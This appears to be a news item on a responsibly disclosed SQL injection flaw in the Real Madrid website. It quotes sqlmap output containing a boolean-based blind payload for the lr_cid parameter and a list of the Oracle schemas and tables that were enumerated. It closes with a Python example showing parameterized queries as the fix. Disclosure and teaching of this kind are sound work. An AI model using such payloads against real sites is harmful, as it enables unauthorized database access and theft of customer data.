Real Madrid: SQL Injection by Greek researcher


A Greek researcher identified a significant security flaw in the official Real Madrid website that allowed him to perform SQL injection and gain access to the team's database.


On October 10, Anastasis Vassiliadis identified the vulnerability and informed Real Madrid.
The cooperation was flawless and immediate, and the problem was fixed within a few hours.

It is worth noting that the website's database had over 7,000 tables and many important items, such as millions of customer accounts from the team's official store.

Some vulnerability information:

sqlmap resumed the following injection point(s) from stored session:

Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c=RM_Noticia_FA&lr_cid=-8384 OR 8642=8642&lr_language=de&lr_pid=3&pagename=RealMadridResponsive/Comunes/Logica/urlCambioIdioma

web application technology: JSP
back-end DBMS: Oracle

Database: EXFSYS
[1 table]
+---------------------+
| RLM$PARSEDCOND      |
+---------------------+

Database: XDB
[2 tables]
+---------------------+
| XDB$IMPORT_TT_INFO  |
| XDB$XIDX_IMP_T      |
+---------------------+

Database: APEX_030200
[3 tables]
+---------------------+
| WWV_FLOW_DUAL100    |
| WWV_FLOW_LOV_TEMP   |
| WWV_FLOW_TEMP_TABLE |
+---------------------+

Database: SYSTEM
[4 tables]
+---------------------+
| HELP                |
| OL$                 |
| OL$HINTS            |
| OL$NODES            |
+---------------------+

Database: FATWIREDLV
[3437 tables]

Database: SYS
[26 tables]

Database: MDSYS
[35 tables]
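
Why the reported lr_cid value changes the query result, and what stops it, shown as an added example (not code from the article or from the affected site). It assumes an in-memory SQLite table with hypothetical names (articles, cid, title) in place of the Oracle back end, and reuses the lr_cid value from the sqlmap output above.

```python
import re
import sqlite3

# Constructed stand-in data: the real site ran JSP on Oracle; the table and
# column names below are hypothetical.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (cid INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [(1, "Match report"), (2, "Transfer news"), (3, "Interview")])
    return db

def lookup_vulnerable(db, lr_cid):
    # The parameter text is pasted into the statement, so "OR 8642=8642"
    # becomes part of the WHERE clause instead of part of the value.
    sql = "SELECT title FROM articles WHERE cid = " + lr_cid
    return [row[0] for row in db.execute(sql)]

def lookup_hardened(db, lr_cid):
    # 1) Accept only a plain integer; anything else never reaches the database.
    if not re.fullmatch(r"-?[0-9]{1,18}", lr_cid):
        return None  # caller should answer 400 Bad Request
    # 2) Bind the value so the driver treats it as data, never as SQL.
    rows = db.execute("SELECT title FROM articles WHERE cid = ?", (int(lr_cid),))
    return [row[0] for row in rows]

REPORTED_VALUE = "-8384 OR 8642=8642"  # lr_cid value from the sqlmap output

if __name__ == "__main__":
    db = make_db()
    # "-8384" alone matches no row; with the always-true OR appended, the
    # vulnerable lookup returns every row. That visible difference is what
    # "boolean-based blind" refers to.
    for value in ("2", "-8384", REPORTED_VALUE):
        print(repr(value), lookup_vulnerable(db, value), lookup_hardened(db, value))
```

On Oracle with JSP, the same two steps are a numeric check on the request parameter followed by a `PreparedStatement` with a `?` placeholder.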

Awareness of vulnerabilities discovered in organizations is considered extremely necessary (especially when they are on high-traffic websites), and for us they are an immediate priority.
